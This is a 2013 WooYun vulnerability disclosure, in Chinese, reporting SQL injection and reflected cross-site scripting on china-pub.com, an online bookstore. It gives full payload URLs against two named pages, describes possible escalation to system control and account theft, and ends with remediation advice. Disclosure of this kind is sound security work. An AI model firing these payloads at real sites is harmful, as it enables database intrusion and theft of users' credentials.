当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022435

漏洞标题:互助出版社china-pub存在SQL injection以及跨站问题

相关厂商:china-pub.com

漏洞作者: 心灵hacker

提交时间:2013-04-24 17:24

修复时间:2013-04-29 17:25

公开时间:2013-04-29 17:25

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-24: 细节已通知厂商并且等待厂商处理中
2013-04-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

china-pub.com是中国最大的网上书店,该网站存在SQL注入漏洞以及跨站。

详细说明:

SQL注入点:
http://www.china-pub.com/main/sale/bestsellers1.asp?tid=59-16-2%27%20and%200%3C%3E%28select%20@@version%29--
漏洞危害:sql 2000存在提权0day,可以通过sql注入点得到数据库sysadmin权限,从而获取数据库的管理员权限,获取主机系统权限,甚至以此为跳板发动对DMZ区的其他主机的渗透攻击,进一步扩大影响面。
跨站漏洞地址:
www.china-pub.com/edition06/dl.asp?fjm=no&scriptname=>'>"><ScRiPt>window.a%3D%3D1%3F1%3Aalert(a%3D1)<%2FScRiPt>
漏洞危害:主要用于网络钓鱼,盗取china-pub网站用户的账号和密码。

漏洞证明:

SQL注入点演示:

1.jpg


跨站漏洞演示:

2.jpg

修复方案:

解决方案:
1.对输入输出进行过滤,不允许输入特殊字符。
预防措施:
由于是黑盒测试,不能保证检测的全面性,日后可能会有其他新的漏洞,建议做好预防工作。
1.请预先做好主机层面的配置,做好系统日志策略配置,定期查看分析日志,确保异常行为可被及时察觉。
2.可采用Web应用防火墙或自行对邮件平台加固的方式,防范可能存在的恶意指令攻击。部署IDS(入侵检测)产品,对IDS的规则库进行配置,确保能够检查到URL中常见的攻击字符串,从而及时发现此类未知web漏洞的攻击。
3.建议聘请安全公司进行全面的安全评估与渗透测试。
4.关注wooyun网站,了解国内漏洞动态信息与安全事件。

版权声明:转载请注明来源 心灵hacker@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-04-29 17:25

厂商回复:

漏洞Rank:7 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论